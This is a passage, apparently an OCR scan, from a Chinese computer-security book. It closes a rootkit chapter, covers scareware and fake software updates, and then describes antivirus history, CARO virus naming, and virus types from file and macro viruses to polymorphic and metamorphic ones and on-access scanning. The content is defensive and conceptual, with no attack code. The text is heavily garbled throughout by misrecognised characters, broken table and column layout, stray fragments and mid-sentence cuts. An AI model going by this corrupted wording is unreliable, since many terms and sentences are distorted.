员 的 注意 ; 新 的 战场 已 经 出 现 ， 必 须 创 造 新 的 检测 技术 。 我 个 人 认为 ， 最 好 的 Rootkit 检 测 技术 将 是 硬件 和 软件 混合 的 。 


除了 Rootkit 用 于 着 履 操作 系统 的 不 同 技术 之 外 ， 攻 击 者 现在 使 用 的 一 些 Rootkit 用 窃取 的 数字 签名 证 书签 署 ， 这 使 得 研究 人 
员 更 加 难以 应 对 这 种 威胁 。 


Rootkit 的 战争 正在 合演 愈 烈 ， 最 终 用 户 将 因为 恶意 软件 利用 高 级 Rootkit 技 术 而 受害 。 恶 意 软件 的 感染 将 会 持续 更 长 时 间 并 
且 造 成 更 大 的 破坏 ， 因 为 Rootkit 对 恶意 软件 提供 保护 并 且 在 它们 被 删除 时 进行 重新 安装 。Rootkit 已 经 转移 到 新 的 领域 ， 能 够 产 
生 比 以 前 大 得 多 的 破坏 力 。 数 据 采 集 与 监控 (Supervisory Control and Data Acquisition, SCADA) 网 络 、 汽 车 计算 机 、 手 机 
和 围绕 联网 家 庭 和 联网 制造 过 程 的 物 联网 (loT) 是 下 一 个 遭受 Rootkit 打 击 的 领域 。 想 象 一 下 将 其 安装 在 汽车 计算 机 上 ， 它 能 
阻止 防 抱 死 系统 的 使 用 或 者 导致 GPS 软件 再 也 不 能 找到 特定 地 址 。 


三 部 分 ”预防 技术 


案例 研究 : 披 着 羊皮 的 狼 


于 具有 预算 的 企业 级 客户 ， 而 一 般 的 家 


解决 日 益 增长 的 恶意 软件 问题 的 预防 技术 和 方法 有 数 百 种 。 最 先进 的 解决 方案 总 是 
R t 是 你 必须 当心 ， 因 为 恶意 软件 编写 者 可 


庭 用 户 无 法 承受 。 大 部 分 时 候 ， 家 庭 用 户 只 能 使 用 简单 的 端点 解决 方案 。 这 没什么 错 
能 利用 这 种 解决 方案 ， 将 其 恶意 软件 假扮 成 安全 解决 方案 。 


1s > 


TREE 


恐吓 性 软件 丽 吓 用 户 ， 使 其 下 载 一 个 软件 ， 这 个 软件 看 似 恶 意 软 件 解决 方案 ， 实 则 是 一 个 恶意 软件 。 丽 吓 性 软件 通常 在 用 户 
访问 菜 些 网 站 时 弹出 ， 它 通常 显示 一 个 虚假 的 计算 机 扫描， 就 像 实时 地 发 现 许多 恶意 软件 似 的 。 其 效果 就 是 恶 吓 用 户 ， 使 他 们 做 
丽 吓 软件 所 希望 的 事情 一 下 载 庶 假 软件 ， 并 用 用 户 的 信用 卡 付费 。 





结果 是 ， 用 户 在 三 个 方面 成 为 丽 咱 性 软件 的 受害 者 : 


- 用 户 的 信用 卡 为 虚假 的 恶意 软件 解决 方案 付费 。 


* 攻击 者 得 到 了 用 户 的 信用 卡 卡号 。 


虚假 软件 


虚假 软件 假扮 成 目标 机 器 上 安装 的 流行 软件 的 更 新 。 它 们 没有 恶 吓 用 户 安 装 恶 意 软 件 ， 而 是 将 自己 当成 一 个 软件 更 新 来 传 
播 ， 似 乎 不 安装 它们 就 不 能 修复 软件 缺陷 、 享 受 新 功能 。 其 用 户 界 面 或 者 主 显示 屏幕 完全 复制 了 假扮 的 合法 软件 。 


真实 性 外 观 


上 述 两 类 恶意 软件 的 共同 点 是 真实 性 外 观 。 恶 意 软 件 作 者 尽 其 所 能 ， 使 讶 假 的 恶意 软件 解决 方案 弹出 窗口 和 更 新 更 具 真 实 


[e] 


但 是 ， 并 非 所 有 界面 都 有 真实 性 外 观 ， 特 别 是 那些 由 不 以 英语 为 母语 的 Rootkit 作 者 匆忙 拼凑 起 来 的 界面 。 用 户 一 定 要 多 加 小 
心 。 例 如 ， 文 本 中 常常 包含 错误 的 英语 ， 使 用 但 语 ， 或 者 包含 对 英语 来 说 没有 意义 的 内 容 。 
对 策 


如 果 面 对 这 些 弹出 窗口 ， 最 佳 的 应 对 方法 就 是 忽略 它们 。 如 果 是 一 个 恶 吓 性 软件 ， 不 要 点 击 弹出 窗口 上 的 任何 东西 ， 而 是 局 
动 最 信任 的 端点 解决 方案 。 如 果 是 一 个 更 新 消息 ， 关 闭 弹出 或 者 消息 窗口 ， 直 接 访问 软件 提供 商 的 主页 ， 从 那里 取得 更 新 。 


将 这 些 欺 诈 行 为 报告 给 软件 发 行者 也 是 最 好 的 办 法 。 大 部 分 软件 发 行者 有 专门 用 于 欺诈 通知 的 电子 邮件 地 址 ， 其 他 发 行者 则 
允许 在 网 站 上 提交 报告 。FBI 也 有 一 个 提交 软件 欺诈 行为 的 网 页 (https://www.ic3.gov/complaint/default.aspx) 。 注 意 ， 在 提交 互 
联网 犯罪 投诉 时 ， 可 能 会 被 问 及 某 些 个 人 信息 。 


第 / 草 Pas 


防 病毒 (AV) 对 于 每 个 计算 机 系统 都 是 必要 的 。 当 你 在 主流 零售 商店 或 者 网 站 上 购买 计算 机 时 ， 防 病毒 软件 就 与 系统 捆 
绑 。 联 邦 政府 和 私有 企业 的 计算 机 安全 策略 现在 都 要 求 在 所 有 连接 到 它们 的 网 络 的 系统 上 安装 防 病毒 软件 。 家 庭 用户 依 靠 防 病毒 
软件 保护 系统 和 数据 免 遭 恶意 的 病毒 、 蠕 虫 、 木 马 、 间 谍 软 件 、 广 告 软件 和 其 他 基于 互联 网 威胁 的 宿主 的 侵害 。 这 种 情况 已 经 持 
续 了 很 长 时 间 ， 对 于 防 病毒 公司 来 说 显然 是 桩 好 生意 ， 但 是 对 于 消费 者 来 说 好 不 好 呢 ? 防 病毒 技术 真 的 有 效 吗 ? 它 是 如 何 工作 
的 ， 是 否 具备 可 持续 性 ? 


在 本 章 中 ， 我 们 将 介绍 当今 市 场 上 几乎 所 有 防 病毒 软件 中 常见 的 特性 和 技术 。 然 后 ， 我 们 将 重点 天 注 关于 防 病毒 技术 有 效 性 
的 争论 ， 以 及 业界 在 近年 来 为 了 生存 所 做 的 努力 。 


注意 : 防 病毒 和 防 亚 意 软 件 这 两 个 术语 在 行业 内 可 以 互 换 使 用 。 防 恶意 软件 已 经 成 为 所 有 恶意 软件 威胁 的 全 面 解决 方案 ， 但 
是 使 用 防 病毒 这 一 术语 仍 是 可 以 接受 的 ， 因 为 从 一 开始 它 就 是 安全 行业 的 惯用 语 ， 与 新 术语 “ 防 恶 意 软 件 ” 同 义 。 


7.1 现在 和 以 后 : 防 病毒 技术 的 革新 


蠕虫 和 病毒 有 着 及 脏 而 漫长 的 历史 。 它 已 经 从 简单 的 文件 感染 病毒 发 展 成 今日 常见 的 、 更 致命 的 高 级 日 益 软 件 。 恶 意 软件 技 
术 的 发 展 迫 使 防 病毒 技术 随 之 发 展 。 这 种 猫 抓 者 鼠 的 游戏 是 我 们 在 Rootkit 作 者 和 防 Rootkit 技 术 的 斗争 中 已 经 看 到 的 熟悉 概念 。 
一 种 技术 的 进步 迫使 另 一 种 技术 也 发 展 ， 导 致 了 没完 没 了 地 交 蔡 领先 的 循环 。 


防 病毒 世界 中 的 这 种 猫 抓 老鼠 的 游戏 开始 于 20 世 纪 80 年 代 未 ， 这 是 因为 一 些 简单 的 感染 磁盘 上 计算 机 程序 的 文件 病毒 。 病 
毒 通过 可 移动 媒体 如 软盘 来 传播 。 在 那个 时 候 ， 简 单 的 防 病毒 应 用 程序 在 磁盘 上 检查 这 些 恶 意 文件 的 存在 并 且 删 除 它 们 。 从 这 一 
概念 中 产生 了 业界 巨人 : Norton， 防 病毒 业界 也 由 此 而 生 。 


为 了 对 抗 不 断 成 长 的 检测 业界 ， 病 毒 作者 采用 了 更 先进 的 感染 和 传播 方法 。20 世 纪 90 年 代 中 期 互联 网 的 兴起 是 这 些 病 毒 完 
美的 滋生 和 繁殖 的 土壤 ， 很 快 病毒 的 传播 能 力 随 着 电子 邮件 发 展 成 为 个 人 和 企业 使 用 的 主要 通信 来 源 而 变 得 几乎 没有 限制 。 防 病 
毒 软件 改变 了 自己 的 方法 ， 对 发 出 的 邮件 也 扫描 病毒 。 免 费 的 webmail 服 务 如 Yahoo! 添加 了 病毒 扫描 能 力 ， 以 帮助 避 开 这 种 
威胁 。 在 其 他 产品 中 也 发 生 了 类 似 的 革新 ， 例 如 Web 浏 览 器 和 电子 邮件 客户 端 中 以 工具 栏 和 附件 形式 提供 的 功能 。 


这 使 防 病毒 行业 成 为 价值 100 亿 的 生意 。 


7.2 ”病毒 全 景 





在 进入 围绕 防 病毒 产品 的 问题 之 前 ， 我 们 希望 介绍 病毒 本 身 的 有 关 方 面 一 一 分 类 、 分 级 以 及 命名 惯例 。 所 有 这 些 方面 都 影 
响 防 病毒 产品 的 性 能 和 范围 。 我 们 还 将 快速 地 回顾 当今 感染 计算 机 系统 的 主要 病毒 类 型 。 


对 于 确定 威胁 、 潜 在 影响 以 及 事故 响应 及 /或 处 理 的 计划 来 说 ， 理 解 每 类 病毒 的 能 力 是 很 重要 的 。 病 毒 一 般 在 专门 的 环境 中 
操作 ， 例 如 文件 系统 、 启 动 扇 区 或 者 宏 。 我 们 将 关注 典型 的 文件 和 启动 扇 区 病毒 ， 它 们 已 经 在 公众 的 视野 中 存在 了 超过 25 年 ; 
宏 病毒 的 开发 、 发 展 和 成 功 ;以 及 复杂 病毒 的 革新 。 本 章 稍 后 ， 我 们 将 介绍 每 类 病毒 的 实例 ， 以 阐述 现实 世界 中 的 病毒 以 及 它们 
成 功 的 因素 。 


7.2.1 “病毒 的 定义 


从 纯粹 的 技术 定义 来 说 ， 病 毒 是 一 个 文件 ， 它 通过 控制 执行 流 或 者 将 自身 附着 于 目标 文件 来 修改 其 他 文件 。 病 毒 可 能 将 自身 
复制 到 多 个 存储 位 置 (连接 的 磁盘 ) 以 及 网 络 上 的 其 他 主机 ， 修 改 磁盘 或 者 内 存 中 的 系统 对 象 ， 或 者 以 某 种 方式 破坏 常规 的 系统 
操作 。 病 毒 倾向 于 破坏 系统 、 连 接 的 设备 以 及 数据 。 病 毒 不 应 该 与 相关 的 术语 如 蠕虫 、 特 洛 伊 木 马 、 后 门 和 其 他 恶意 软件 渴 清 ， 
虽然 所 有 这 些 软 件 产品 的 功能 互相 重 著 。 下 面 是 对 各 种 恶意 软件 之 间 的 区 别 的 一 个 概述 : 


` 特洛伊 木马 ”声称 或 者 似乎 有 菜 种 功能 ， 但 是 同时 包含 不 受 欢迎 或 者 未 声明 的 功能 的 一 种 程序 ， 通 常 给 菜 些 人 对 计算 机 未 
经 授权 的 远程 访问 权 ， 或 者 下 载 其 他 恶意 软件 。 


` 蠕虫 ”通过 网 络 感 染 主机 而 自主 繁殖 的 一 种 程序 。 


im 
ui 


绕 过 常规 验证 或 者 连接 方法 ， 提 供 到 计算 机 的 未 经 授权 访问 的 一 种 隐藏 性 程序 。 


另 一 种 类 似 恶意 软件 的 程序 是 灰色 软件 (grayware) ， 通 常 包含 广告 软件 和 间谍 软件 ， 这 些 程序 不 像 恶 意 软 件 那么 危险 ， 
但 是 仍然 会 降低 系统 性 能 ， 弱 化 系统 安全 态势 ， 暴 露 新 的 漏洞 ， 而 且 一 般 安装 可 能 影响 系统 可 用 性 的 令 人 烦恼 的 应 用 程序 。 


* 间谍 软件 : 捕捉 数据 (包括 但 不 限于 计算 习惯 ) 以 创建 用 户 资料 的 一 种 程序 。 
* 广告 软件 : 根据 收集 到 的 受害 用 户 计 算 习惯 提供 广告 (通常 通过 弹出 窗口 ) 的 程序 。 


另 一 方面 ， 病 毒 感染 现 有 的 程序 和 应 用 ， 并 且 通 过 感染 主机 上 的 这 些 应 用 程序 传播 。 根 据 病毒 的 具体 目标 ， 它 还 可 能 使 用 特 
权 系 统 功 能 提升 权限 ， 甚 至 为 了 保护 自己 而 安装 一 个 Rootkit。 大 部 分 病毒 不 试图 隐 菩 ， 除 非 病毒 很 先进 并 且 包 含 多 态 功 能 。 


计算 机 病毒 在 许多 方面 上 类 似 于 生物 学 上 的 病毒 : 依赖 一 个 宿主 存活 ， 并 且 具 有 可 用 于 识别 和 预防 病毒 的 代表 特性 。 


防 病毒 产品 原来 是 用 于 预防 程序 受到 已 知 病毒 感染 的 。 从 那 时 起 ， 防 病毒 产品 与 不 断 增 长 的 各 类 恶意 软件 和 灰色 软件 一 起 发 
展 ， 并 且 总 是 宣传 自己 发 现 所 有 类 型 恶意 软件 的 能 力 。 但 是 本 章 仅仅 关注 病毒 。 


了 .2.2 DK 


病毒 研究 人 员 使 用 一 种 分 类 系统 来 区 分 病毒 ， 以 维护 病毒 研究 领域 和 信息 共享 中 的 秩序 。 我 们 不 过 多 地 纠缠 于 计算 机 病毒 命 
名 管理 标准 以 及 20 世 纪 90 年 代 初 以 来 ， 更 新 的 缺乏 一 一 这 是 令 
Symantec (http://www.symantec.com/avcenter/reference/virus.and.vulnerability.pdf) 和 其 他 防 病毒 供应 商都 感到 泪 
的 一 种 看 法 ， 而 是 提供 得 到 普遍 接受 的 命名 惯例 的 简单 参考 指南 。1991 年 ， 计 算 机 防 病毒 研究 组 织 (Computer AntiVirus 
Researchers Organization, CARO) 成 立 了 一 个 委员 会 为 病毒 研究 提供 标准 的 命名 惯例 。 商 定 的 惯例 是 : 


操作 系统 /平台 家 族 名 .组 名 . 主 变种 .次 变种 [: 修饰 语 ]@ 后 绥 


这 种 命名 惯例 的 每 个 部 分 只 能 使 用 字母 和 数字 字符 ， 不 区 分 大 小 写 。 可 以 使 用 下 划 线 和 空格 以 增加 易 读 性 。 每 一 段 都 应 该 限 
制 在 20 个 字符 以 内 。 


表 7-1 详 尽 解 释 了 CARO 命 名 惯例 的 每 个 部 分 。 


表 7-1 CARO 病 毒 命名 惯例 描述 


变量 描述 
表现 根据 结构 相似 度 得 出 的 病毒 所 属 的 家 族 ， 但 是 有 时 候 不 可 能 有 正式 的 家 族 定义 。 家 族 名称 也 可 
在 代码 本 身 中 定义 ， 实 际 上 给 了 作者 命名 病毒 的 机 会 
组 名 家 族 的 子 类 ， 但 是 很 少 使 用 


主 变种 几乎 总 是 一 个 数字 ， 是 病毒 的 长 度 (如 果 已 知 ) 

次 变种 现 有 病毒 的 小 变种 ,一般 具有 相同 的 感染 长 度 和 结构 。 次 变种 一 般 由 一 个 字符 表示 (A，B，C 等 ) 
修饰 语 用 于 以 使 用 的 多 态 引 擎 来 描述 多 态 病 毒 。 如 果 使 用 了 超过 一 个 多 态 引 擎 ， 定 义 可 能 包含 超过 一 个 修 
ca [E] 饰 语 

后 级 后 缀 用 于 有 具体 描述 病毒 的 传播 方法 ， 例 如 电子 邮件 或 者 邮件 群发 分 别 被 缩写 为 @M 和 @MM 


表 7-2 是 一 个 病毒 名 称 前 缀 的 总 表 。Symantec 在 其 网 站 上 提供 一 个 详细 的 列表 


(http://www.symantec.com/security response/virusnaming.jsp) 。 


表 7-2 标准 病毒 命名 前 级 惯例 


BY Se 描述 
Adware 有 助 于 向 用 户 推送 广告 内 容 的 程序 
Android 针对 安 盏 操作 系统 的 威胁 
( 续 ) 
BY Se 描述 
Backdoor 允许 未 授权 访问 和 控制 被 侵入 计算 机 的 威胁 
DDoS 执行 分 布 式 拒绝 服务 攻击 的 威胁 
Downloader 从 远程 位 置 下载 和 执行 文件 的 威胁 
Infostealer 穷 取 信息 的 威胁 
Linux 以 基于 Liunx 操作 系统 为 目标 的 威胁 
097M 以 97 以 上 版 本 的 多 种 Microsoft Office 应 用 为 目标 的 恶意 宏 
Spyware 跟踪 用 户 习 惯 或 者 收集 、 发 送 个 人 可 识别 信息 及 机 密 信息 的 风险 
Trackware 监控 计算 机 活动 、 收 集 系 统 信息 或 者 跟踪 用 户 习 惯 的 程序 
Trojan 可 能 伪装 成 有 益 程 序 、 实 际 上 是 恶意 代码 的 文件 
Unix 以 基于 Unix 操作 系统 为 目标 的 威胁 
W32 以 32 位 Windows 操作 系统 为 目标 的 自传 播 威胁 
W64 以 64 位 Windows 操作 系统 为 目标 的 自传 播 威胁 
W97M 以 Microsoft Word (97 以 上 版 本 ) 为 目标 的 恶意 Microsoft Office 宏 
X97M 以 Microsoft Excel (97 以 上 版 本 ) 为 目标 的 恶意 Microsoft Office X 


7.23 ”简单 病毒 


在 本 小 节 中 ， 我 们 将 介绍 几 种 病毒 类 型 及 其 特性 。 这 些 病毒 都 被 称 为 简单 病毒 或 者 病原 体 病毒 。 这 些 程序 是 过 去 四 分 之 一 个 
世纪 中 恶意 软件 的 骨干 。 


e 文件 病毒 





除了 前 面 定义 的 病毒 基本 目的 之 外 ， 文 件 病毒 还 可 以 感染 磁盘 上 的 一 个 或 者 多 个 可 执行 二 进 制程 序 。 这 通常 意味 着 为 该 文件 
添加 功能 ， 但 是 也 就 部 分 或 者 完全 覆盖 了 文件 。 这 种 类 型 的 病毒 通过 在 可 信任 的 文件 中 隐藏 自身 来 达到 隐蔽 的 目的 ， 所 以 下 次 用 
户 装 入 文件 时 ， 病 毒 得 以 执行 。 但 是 ， 正 如 病毒 的 定义 所 说 的 ， 隐 蔽 性 不 是 首要 的 目标 。 


为 了 进行 这 些 操作 ， 病 毒 必须 使 用 某 种 感染 方法 ， 表 7-3 显 示 了 用 于 感染 系统 的 常见 方法 。 


表 7-3 常见 文件 病毒 感染 方法 


感染 方法 病毒 进行 的 操作 
覆盖 病毒 删除 目标 代码 并 用 感染 的 文件 代替 
寄生 寄生 病毒 在 现 有 文件 上 附加 、 预 谋 或 者 插入 病毒 代码 ， 以 便 获 得 文件 的 控制 权 
( 续 ) 
感染 方法 病毒 进行 的 操作 
如 果 文 件 名 完全 相同 ， 伴 生病 毒 使 用 COM/EXE/BAT 的 DOS 文件 执行 顺序 。 假 如 一 个 文件 
伴生 称 为 Foobar.exe， 伴 生病 毒 将 把 自己 命名 为 Foobarcom 以 便 在 用 户 于 命令 提示 符 下 输入 Foorbar 
时 执行 ， 然 后 ， 病 毒 运 行 Foobar.exe， 由 于 预期 的 文件 正常 执行 ， 表 面 上 似乎 没有 异常 
链接 链接 修改 文件 系统 中 的 目标 字段 ， 包 含 一 个 到 病毒 文件 的 链接 
此 ` pa y Br i 在 源 > Fi 由 含 一 个 活 去 Ary 毒 ， why 毒 将 网 v imi 安装 其 
应 用 程序 源 代 三 应 用 程序 可 以 修改 ， 在 源 代码 中 包含 一 个 活动 的 病毒 ， 这 个 病毒 将 在 应 用 程序 安装 期 间 
AS 


NZ 


启动 扇 区 病毒 





司 动 扇 区 病毒 设计 用 于 感染 系统 硬盘 的 主 引 导 记 录 (MBR) 。 主 引导 记录 是 局 动 扇 区 的 一 种 类 型 ， 存 储 关 于 磁盘 的 信息 ， 
比如 分 区 的 数量 和 类 型 。 在 驱动 器 构造 中 ，MBR 始 终 位 于 柱 面 0、 磁 头 0、 扇 区 上 1。 

启动 过 程 由 系统 BIOS 在 固件 中 开始 ， 然 后 转移 到 安装 的 操作 系统 ， 这 由 MBR 指 出 。 启 动 扇 区 病毒 仅仅 感染 了 系统 上 的 
MBR; BIOs 执 行 这 个 病毒 而 不 是 操作 系统 。 病 毒 将 原始 引导 扇 区 的 一 个 拷贝 复制 到 磁盘 上 的 另 一 个 位 置 ， 这 样 病毒 可 以 将 控制 
权 传 递 给 原始 引导 扇 区 ， 继 续 常 规 的 引导 过 程 。 


病毒 必须 存在 于 计算 机 系统 上 的 第 一 个 启动 设备 的 启动 扇 区 才能 得 以 执行 。 这 种 启动 顺序 很 容易 在 现代 BIOS 程 序 中 修改 而 
指向 CD-ROM、USB 设 备 或 者 软盘 。 如 果 系统 从 未 受 感染 的 媒体 上 启动 ， 病 毒 将 不 会 装 入 。 


宏 病 毒 





宏 病毒 在 20 世 纪 90 年 代 中 期 由 于 Microsoft Office 套 件 流行 而 流行 ， 宏 使 用 户 可 以 在 Office 套 件 中 执行 超出 典型 内 容 /数据 
生成 /处 理学 围 的 特定 人 物 。 换 言 之 ， 应 用 程序 安 (或 简称 安 ) 是 一 个 指向 通常 重复 执行 的 任务 的 编程 快捷 方式 。 病 毒 利用 的 是 
这 一 功能 引入 的 在 文档 中 保存 代码 的 能 力 ， 将 相同 的 代码 传递 给 其 他 类 似 的 文档 ， 从 而 复制 自身 并 传播 到 其 他 文件 。 


宏 虽 然 非常 有 用 和 便利 ， 但 是 也 非常 有 破坏 性 。 宏 以 Microsoft Visual Basic for Applica-tions (VBA) 编写 ， 当 
Microsoft Office 应 用 程序 装 入 时 Word Basic 可 以 自动 装 入 。 这 为 病毒 提供 了 在 未 通知 用 户 情 况 下 启动 的 理想 机 会 。 例 如 ， 用 
户 接收 到 一 个 电子 邮件 ， 包 含 Word 文 档 附件 并 打开 。 这 个 Word 文 档 启动 ， 宏 病毒 就 被 装 入 到 目标 系统 。 宏 病毒 的 自动 装 入 可 
以 通过 几 自 种 不 同 的 宏 类 型 以 及 支持 文档 绑 定 宏 的 任何 应 用 程序 来 完成 。Microsoft 应 用 程序 常常 成 为 这 种 类 型 病毒 的 目标 ， 这 
是 因为 它们 的 整体 流行 性 /采用 率 、 广 泛 的 集成 性 以 及 宏 的 支持 。 


大 部 分 应 用 程序 已 经 默认 禁用 了 许多 宏 控 件 或 者 要 求 运行 宏 时 进行 用 户 交 互 。Microsoft Office 隔 离 转 换 环境 (Microsoft 
Office Isolated Conversion Environment, MOICE, http://support.microsoft.com/kb/935865) 是 由 Microsoft 开 发 的 一 
个 免费 工具 ， 通 过 动态 地 在 一 个 隔离 的 沙 箱 里 将 二 进 制 Microsoft 文 档 转 换 为 更 新 的 开放 XML 格式 ， 帮 助 阻止 安 病毒 的 运行 。 这 
一 转换 删除 了 可 能 导致 病毒 装 入 和 成 功 运行 的 任何 恶意 内 容 。 美 国 国家 安全 局 (NSA) 在 公开 的 《Mitigation Monday) 

(http://www.nsa.gov/ia/_files/factsheets/MitigationMonday.pdf) 文章 中 建议 将 MOICE 作 为 基本 的 安全 措施 。 


2015 年 ，Sophos 发 现 了 利用 宏 病 毒 的 一 次 攻击 。 网 络 犯罪 分 子 卷 土 重 来 ， 因 为 他 们 相信 向 目标 系统 传送 一 个 带 有 陷阱 的 文 
档 比 传递 可 执行 文件 容易 ， 因 为 组 织 的 常用 做 法 是 阻止 可 执行 文件 传 入 / 传 出 。 关 于 Sophos 发 现 的 更 多 信息 可 以 在 其 博客 上 找 
到 : https://blogs.sophos.com/2015/09/28/why-word-malware-is-basic/。 


7.2.4 ”复杂 病毒 


在 本 小 节 中 ， 我 们 将 关注 复杂 的 病毒 如 何在 病毒 开发 和 检测 之 间 不 断 的 “军备 竞赛 ”中 得 到 发 展 。 在 防 病毒 开发 公司 持续 地 
对 抗 全 球 病毒 的 同时 ， 病 毒 的 开发 也 保持 着 创造 力 ， 寻 求 新 的 技术 来 躲避 防 病毒 软件 。 


加 密 病毒 





加 密 病 毒 是 避免 被 防 病毒 软件 发 现 的 努力 中 的 第 一 个 重大 突破 ;加 密 引 擎 将 加 密 文 本 ， 帮 助 衙 避 简 单 防 病毒 引擎 的 ASCI| 或 
者 十 六 进 制 检测 扫描 。 这 种 病毒 的 思路 是 加 密 病 毒 负荷 并 且 采 用 一 个 自 解密 模块 ， 以 便 在 运行 时 执行 代码 。 这 阻止 了 防 病毒 扫描 
程序 通过 旧 的 特征 码 检测 方法 发 现 病毒 。 但 是 ， 防 病毒 软件 特征 码 检测 技术 已 经 发 展 为 以 解密 模块 本 身 作为 焦点 ， 这 个 模块 在 以 
前 发 现 的 病毒 副本 中 找到 并 且 进行 了 分 析 。 


Bains 
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码 (oligomorphic code) 是 一 种 代码 样 例 ， 能 够 在 多 种 解密 程序 中 随机 选择 以 感染 目标 。 这 使 袁 型 病毒 能 够 利用 多 种 加 密 程序 
将 基本 的 加 密 病毒 提升 到 一 个 更 高 的 水 平 。 嘉 型 病毒 和 多 态 病 毒 ( 接 下 来 会 说 明 ) 一 样 能 够 改变 加 密 程序 ; 但 是 ， 它 不 能 改变 加 
密 的 基础 代码 。 一 些 病 毒 能 够 创建 多 个 加 密 程序 模式 ， 每 一 代 都 变 得 无 法 辨 从， 从 而 避免 了 基于 特征 码 的 防 病毒 检测 。 


NIZ 
ó- 
多 态 病毒 


病毒 中 最 常见 的 代码 变形 类 型 是 多 态 。 多 态 病毒 (polymorphic viruse) 能 够 创建 不 限 数量 的 新 加 密 程 序 ， 这 些 加 密 程序 都 
能 使 用 病毒 体 上 的 不 同 加 密 方法 。 多 态 引 擎 被 设计 用 于 伪 随 机 码 生成 器 ， 以 及 创建 多 种 伪造 代码 变形 的 技术 ， 以 便 混淆 病毒 代码 
主体 。 这 使 该 病毒 极其 难以 检测 。 


变形 病毒 (metamorphic viruse) 不 同 于 多 态 病 毒 ， 它 们 不 包含 不 变 的 病毒 体 或 者 解密 程序 。 在 新 一 代 中 ， 病 毒 体 本 身 都 
进行 足够 避 开 检测 的 变形 。 这 种 变形 代码 封装 在 一 个 能 够 携带 病毒 代码 的 代码 体 中 。 变 形 代码 的 最 大 特征 是 没有 完全 地 修改 代 
码 ， 而 仅 仪 修改 其 功能 ， 例 如 ， 寡 人 存 器 交换 、 修 改 流 控制 以 及 重新 排序 独立 指令 。 这 些 相 对 不 明显 的 语义 变化 不 影响 病毒 的 能 
力 ， 却 能 够 轻易 地 欺骗 许多 防 病毒 产品 。 


@ 入 口 点 混淆 病毒 

复杂 病毒 值得 一 提 的 最 后 一 种 类 型 是 入 口 点 混淆 (entry-point obscuring，EPO) 病毒 。 这 种 病毒 设计 为 在 现 有 的 程序 中 
以 补丁 或 者 更 新 的 形式 在 随机 的 位 置 上 写 入 代码 。 然 后 ， 当 刚刚 被 感染 的 程序 执行 时 ， 就 跳 转 到 病毒 代码 并 且 开 始 执 行 病毒 而 不 
是 可 信任 的 程序 。 现 在 病毒 可 以 从 机 器 上 可 信任 的 程序 上 执行 ， 防 病毒 引擎 不 太 可 能 发 现 这 种 执行 方法 。 这 个 病毒 家 族 现 在 非常 
常见 ， 并 且 能 够 长 时 间 地 在 系统 上 不 为 人 知 地 进行 操作 。 





7.3 ” 防 病 毒 一 一 核心 特性 和 技术 

防 病毒 产品 的 终极 目标 是 保护 端点 主机 免 遭 恶意 软件 (具体 地 说 ， 就 是 刚刚 讨论 过 的 病毒 类 型 ) 的 侵害 。 因 此 ， 防 病毒 产品 
一 般 安 装 在 主机 上 并 且 运 行 各 种 服务 以 及 一 个 或 者 多 个 代理 ， 这 些 被 统称 为 防 病毒 引擎 。 检 测 引 警 有 两 种 主要 的 系列 : 手工 或 
者 按照 需要 (on demand) ， 实 时 或 者 访问 时 (on-access) 。 


7.3.1 手工 或 者 “ 按 需 ”扫描 


防 病毒 产品 的 最 基本 功能 是 在 用 户 指 示 时 扫描 文件 。 这 种 情况 通常 包括 注意 安全 的 用 户 在 下 载 一 个 程序 和 或 者 文件 附件 时 启 
动 对 该 文件 的 按 需 扫描 。 因 为 这 种 方法 要 求 用 户 交互 以 启动 扫描 ， 不 能 保护 系统 免 受 大 量 动 态 恶 意 软件 (例如 在 文档 打开 时 执行 
的 宏 病 毒 ) 的 侵害 。 如 果 用 户 没 有 意识 到 宏 病毒 ， 他 不 会 知道 在 打开 之 前 扫描 文件 。 甚 至 用 户 进行 了 扫描 ， 检 测 也 只 能 达到 防 病 
毒 产 品 及 其 底层 引擎 的 水 平 。 不 管 哪 种 情况 ， 都 不 能 保证 发 现 所 有 病毒 。 


按 需 扫 描 实际 上 是 一 种 脱 机 扫描 ， 这 意味 着 被 扫描 的 文件 保存 在 磁盘 上 而 且 未 被 执行 。 防 病毒 引擎 将 检测 磁盘 上 的 文件 并 且 
将 其 与 特征 码 数 据 库 (我 们 将 很 快 谈 到 特征 码 扫 描 ) 中 的 二 进 制 特征 码 进行 比较 。 如 果 防 病毒 引擎 发 现 匹配 的 文件 ， 防 病毒 程序 
将 警告 用 户 该 文件 已 被 感染 并 且 提 供 各 种 建议 的 操作 ， 例 如 删除 、 改 名 或 者 隔离 文件 。 隔 离 文件 一 般 包 括 防 病毒 产品 将 文件 移 到 
硬盘 上 的 一 个 隔离 文件 夹 中 ， 蓉 用 该 文件 并 且 标 识 为 不 可 执行 的 ， 这 样 就 防止 该 文件 被 用 户 无 意 中 执行 。 


因为 这 种 检测 类 型 依赖 于 用 户 局 动 扫描 ， 大 部 分 防 病毒 产品 都 将 其 作为 辅助 产品 功能 。 最 有 用 的 扫描 在 一 个 或 者 多 个 动态 、 
实时 的 组 件 中 提供 ， 在 用 户 工作 时 透明 地 进行 主动 的 病毒 扫描 ， 这 被 称 为 访问 时 扫描 。 


73.2 ”实时 或 者 “访问 时 ”扫描 


访问 时 扫描 通常 在 用 户 不 知情 的 情况 下 发 生 。 在 用 户 打 开 应 用 程序 、 读 取 电 子 邮 件 或 者 下 载 Web 内 容 时 ， 防 病毒 引擎 不 断 
扫描 系统 内 存 以 及 磁盘 寻找 病毒 。 如 果 检测 到 一 个 病毒 ， 防 病毒 产品 将 首先 试图 停止 恶意 活动 (例如 ， 如 果 是 一 个 网 络 活动 ， 防 
病毒 产品 将 阻塞 这 个 活动 ) ， 然 后 通知 用 户 采 取 措 施 。 这 种 扫描 类 型 与 脱 机 风格 的 按 需 扫描 相反 。 


访问 时 扫描 是 当前 市 场 上 所 有 主流 防 病毒 产品 的 主要 检测 方法 。 这 种 类 型 的 检测 的 实现 细节 当然 是 专利 ， 但 是 每 个 供应 商都 
使 用 著名 的 技术 来 检测 病毒 。 实 际 上 ， 你 可 能 注意 到 第 4 章 中 讨论 的 技术 中 引 人 注 目的 相似 性 。 访 问 时 扫描 程 序 在 以 下 时 刻 触 发 
文件 扫描 : 


BAR: 文件 创建 和 写 入 磁盘 时 
> 执行 时 : 在 文件 被 加 载 到 内 存 执行 之 前 
如 果 找 到 匹配 的 恶意 软件 特征 码 ， 引 擎 发 出 感染 警报 。 


访问 时 和 按 需 扫描 在 保护 计算 机 免 遭 数 干 种 活路 的 安全 威胁 侵害 的 重要 任务 中 互 为 补充 。 几 乎 所 有 防 病毒 供应 商都 组 合 这 两 
